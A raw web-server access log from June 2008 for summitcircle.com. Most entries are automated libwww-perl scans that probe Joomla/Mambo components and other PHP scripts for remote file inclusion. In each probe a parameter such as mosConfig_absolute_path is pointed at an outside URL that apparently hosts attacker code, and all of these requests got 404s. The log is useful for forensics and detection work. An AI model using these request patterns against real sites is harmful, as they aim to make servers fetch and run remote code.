217.160.76.187 - - [29/Jun/2008:06:23:06 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
216.17.101.27 - - [29/Jun/2008:06:23:33 -0700] "GET /logs/access.log/errors.php?error=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.17.101.27 - - [29/Jun/2008:06:23:33 -0700] "GET /errors.php?error=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.17.101.27 - - [29/Jun/2008:06:23:34 -0700] "GET /logs/errors.php?error=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.17.101.27 - - [29/Jun/2008:06:23:34 -0700] "GET /logs/access.log/errors.php?error=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.17.101.27 - - [29/Jun/2008:06:23:34 -0700] "GET /errors.php?error=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.17.101.27 - - [29/Jun/2008:06:23:34 -0700] "GET /logs/errors.php?error=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.27.0.117 - - [29/Jun/2008:06:24:18 -0700] "GET /logs/access_070910.log HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
216.17.101.27 - - [29/Jun/2008:06:24:56 -0700] "GET /logs/access.log/errors.php?error=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.17.101.27 - - [29/Jun/2008:06:24:56 -0700] "GET /errors.php?error=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.17.101.27 - - [29/Jun/2008:06:24:57 -0700] "GET /logs/errors.php?error=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.208.226.134 - - [29/Jun/2008:06:25:22 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.208.226.134 - - [29/Jun/2008:06:25:22 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:06:25:42 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.221.183.132 - - [29/Jun/2008:06:25:49 -0700] "GET /logs/access_080406.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.221.183.132 - - [29/Jun/2008:06:25:49 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.221.183.132 - - [29/Jun/2008:06:25:49 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
81.209.108.69 - - [29/Jun/2008:06:26:26 -0700] "GET /index.php?content=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:06:26:31 -0700] "GET /logs/access_080331.log//components/com_flyspray/startdown.php?file=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:06:26:31 -0700] "GET //components/com_flyspray/startdown.php?file=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.130.79.34 - - [29/Jun/2008:06:26:32 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:06:27:33 -0700] "GET /logs/access_080331.log//components/com_flyspray/startdown.php?file=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:06:27:33 -0700] "GET //components/com_flyspray/startdown.php?file=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
87.246.68.51 - - [29/Jun/2008:06:27:33 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:27:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:27:58 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:27:58 -0700] "GET /lostpasswd.php?env[include_prefix]=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:27:59 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:28:16 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:28:54 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:28:54 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
208.80.193.33 - - [29/Jun/2008:06:29:14 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; ImageShack Toolbar 3.0.6)" "summitcircle.com"
80.67.20.109 - - [29/Jun/2008:06:29:37 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
216.116.7.83 - - [29/Jun/2008:06:29:39 -0700] "GET /logs/access_071203.log//bemarket/postscript/postscript.php?p_mode=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.116.7.83 - - [29/Jun/2008:06:29:40 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.116.7.83 - - [29/Jun/2008:06:29:41 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:29:57 -0700] "GET /logs/access_071224.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:29:57 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:29:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:29:58 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
63.246.64.173 - - [29/Jun/2008:06:30:04 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
74.6.17.181 - - [29/Jun/2008:06:30:05 -0700] "GET /latest/news/who_is_going_to_buy_skype.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:30:09 -0700] "GET /logs/access_071224.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:30:09 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:30:09 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:30:10 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:30:16 -0700] "GET /logs/access_071224.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:30:16 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:30:16 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:30:17 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:30:18 -0700] "GET /logs/access_071224.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:30:18 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:30:18 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:30:19 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:30:27 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:30:27 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:30:27 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:30:54 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:30:54 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:30:55 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:30:56 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:31:03 -0700] "GET /logs/access.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:31:03 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:31:03 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:31:08 -0700] "GET /logs/access.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:31:08 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:31:08 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.118.97.213 - - [29/Jun/2008:06:31:10 -0700] "GET /logs/access.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [29/Jun/2008:06:31:10 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [29/Jun/2008:06:31:10 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:31:26 -0700] "GET /logs/access_071224.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:31:26 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:31:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.98.184.65 - - [29/Jun/2008:06:31:26 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:31:37 -0700] "GET /logs/access_071224.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:31:37 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:31:37 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.201.66 - - [29/Jun/2008:06:31:38 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.15.205.17 - - [29/Jun/2008:06:31:46 -0700] "GET /logs/access.log/index.php?redir=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
67.15.205.17 - - [29/Jun/2008:06:31:46 -0700] "GET /index.php?redir=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
67.15.205.17 - - [29/Jun/2008:06:31:46 -0700] "GET /logs/index.php?redir=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:32:17 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:32:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:32:43 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:32:43 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:32:43 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:32:44 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:32:44 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:32:44 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:33:44 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:33:44 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:33:44 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:06:33:47 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.34.226.62 - - [29/Jun/2008:06:34:03 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
72.34.226.62 - - [29/Jun/2008:06:34:03 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
72.34.226.62 - - [29/Jun/2008:06:34:04 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
72.34.226.62 - - [29/Jun/2008:06:34:19 -0700] "GET /logs/access.log/view.inc.php?phpAds_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
72.34.226.62 - - [29/Jun/2008:06:34:19 -0700] "GET /view.inc.php?phpAds_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
72.34.226.62 - - [29/Jun/2008:06:34:20 -0700] "GET /logs/view.inc.php?phpAds_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
72.34.226.62 - - [29/Jun/2008:06:34:20 -0700] "GET /logs/access_080120.log/view.inc.php?phpAds_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
72.34.226.62 - - [29/Jun/2008:06:34:20 -0700] "GET /view.inc.php?phpAds_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
72.34.226.62 - - [29/Jun/2008:06:34:20 -0700] "GET /logs/view.inc.php?phpAds_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:06:34:22 -0700] "GET /logs/access.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:06:34:23 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:06:34:23 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:06:34:32 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
64.106.202.240 - - [29/Jun/2008:06:34:43 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
64.106.202.240 - - [29/Jun/2008:06:34:43 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
64.106.202.240 - - [29/Jun/2008:06:34:44 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
62.148.169.202 - - [29/Jun/2008:06:34:51 -0700] "GET /logs/access_071022.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theninjalegion.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
62.148.169.202 - - [29/Jun/2008:06:34:51 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theninjalegion.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
62.148.169.202 - - [29/Jun/2008:06:34:52 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theninjalegion.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:34:58 -0700] "GET /logs/access_071112.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.34.16.180 - - [29/Jun/2008:06:35:47 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
193.34.16.180 - - [29/Jun/2008:06:35:47 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.15.205.17 - - [29/Jun/2008:06:35:54 -0700] "GET /logs/access_080121.log/index.php?redir=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.15.205.17 - - [29/Jun/2008:06:35:54 -0700] "GET /index.php?redir=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
